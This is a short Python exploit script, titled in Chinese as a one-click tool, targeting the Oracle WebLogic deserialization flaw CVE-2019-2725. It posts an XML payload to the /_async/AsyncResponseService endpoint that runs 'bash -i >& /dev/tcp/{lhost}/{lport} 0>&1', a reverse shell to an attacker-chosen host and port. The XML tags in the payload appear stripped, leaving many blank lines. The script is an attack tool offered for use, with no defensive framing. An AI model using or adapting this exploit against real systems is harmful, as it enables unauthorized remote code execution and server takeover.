weblogic CVE-2019-2725 的一键脚本

# -*- coding: utf-8 -*-

import requests
import argparse
class Exploit:
	def __init__(self, rhost, lport, lhost):
		self.url=rhost
		self.lhost=lhost
		self.lport=lport
	def run(self):
		headers={
			'User-Agent' : 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
			'Content-Type' : 'text/xml'
		}
		xml='''
		   
		 
		xx
		xx
		
		
		
		
		/bin/bash
		
		
		-c
		
		
		bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
		
		
		
		
		
		
		
		
		'''
		xml=xml.format(lhost=self.lhost,lport=self.lport)
		r=requests.post(self.url+"/_async/AsyncResponseService", data=xml, headers=headers)
		print "执行成功{url}".format(url=self.url)
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CNVD-C-2019-48814利用工具')
    parser.add_argument(
        '-l',
        required=True,
        dest='lhost',
        nargs='?',
        help='监听ip')
    parser.add_argument(
        '-p',
        required=True,
        dest='lport',
        nargs='?',
        help='监听端口')
    parser.add_argument(
        '-r',
        required=True,
        dest='rhost',
        nargs='?',
        help='CNVD-C-2019-48814漏洞存在的url')
    args = parser.parse_args()
    exploit = Exploit(
        rhost=args.rhost,lport=args.lport,lhost=args.lhost)
    exploit.run()